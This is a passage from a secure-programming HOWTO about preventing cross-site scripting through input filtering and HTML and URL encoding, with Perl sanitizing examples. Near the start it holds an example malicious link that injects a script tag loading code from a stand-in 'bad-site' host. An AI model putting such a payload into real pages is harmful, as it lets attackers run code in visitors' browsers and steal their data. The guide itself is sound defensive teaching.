Secure Programming for Linux and Unix HOWTO | ||
---|---|---|
Prev | Chapter 6. Structure Program Internals and Approach | Next |
<A href="http://example.com/comment.cgi?mycomment=<script src='http://bad-site/badfile'></script>"> Click here</A> |
CERT describes the problem this way in their advisory:
A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources (CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests).
Warning - in many cases these techniques can be subverted unless you've also gained control over the character encoding of the output. Otherwise, an attacker could use an ``unexpected'' character encoding to subvert the techniques discussed here. Thankfully, this isn't hard; gaining control over output character encoding is discussed in Section 8.5.
The first subsection below discusses how to identify special characters that need to be filtered, encoded, or validated. This is followed by subsections describing how to filter or encode these characters. There's no subsection discussing how to validate data in general, however, for input validation in general see Chapter 4, and if the input is straight HTML text or a URI, see Section 4.10. Also note that your web application can receive malicious cross-postings, so non-queries should forbid the GET protocol (see Section 4.11).
Note that, in general, the ampersand (&) is special in HTML and XML.
# Accept only legal characters: $summary =~ tr/A-Za-z0-9\ \.\://dc; |
sub remove_special_chars { local($s) = @_; $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g; return $s; } # Sample use: $data = &remove_special_chars($data); |
This approach to HTML encoding isn't quite enough encoding in some circumstances. As discussed in Section 8.5, you need to specify the output character encoding (the ``charset''). If some of your data is encoded using a different character encoding than the output character encoding, then you'll need to do something so your output uses a consistent and correct encoding. Also, you've selected an output encoding other than ISO-8859-1, then you need to make sure that any alternative encodings for special characters (such as "<") can't slip through to the browser. This is a problem with several character encodings, including popular ones like UTF-7 and UTF-8; see Section 4.8 for more information on how to prevent ``alternative'' encodings of characters. One way to deal with incompatible character encodings is to first translate the characters internally to ISO 10646 (which has the same character values as Unicode), and then using either numeric character references or character entity references to represent them:
A numeric character reference looks like "&#D;", where D is a decimal number, or "&#xH;" or "&#XH;", where H is a hexadecimal number. The number given is the ISO 10646 character id (which has the same character values as Unicode). Thus И is the Cyrillic capital letter "I". The hexadecimal system isn't supported in the SGML standard (ISO 8879), so I'd suggest using the decimal system for output. Also, although SGML specification permits the trailing semicolon to be omitted in some circumstances, in practice many systems don't handle it - so always include the trailing semicolon.
A character entity reference does the same thing but uses mnemonic names instead of numbers. For example, "<" represents the < sign. If you're generating HTML, see the HTML specification which lists all mnemonic names.
URIs have their own encoding scheme, commonly called ``URL encoding.'' In this system, characters not permitted in URLs are represented using a percent sign followed by its two-digit hexadecimal value. To handle all of ISO 10646 (Unicode), it's recommended to first translate the codes to UTF-8, and then encode it. See Section 4.10.4 for more about validating URIs.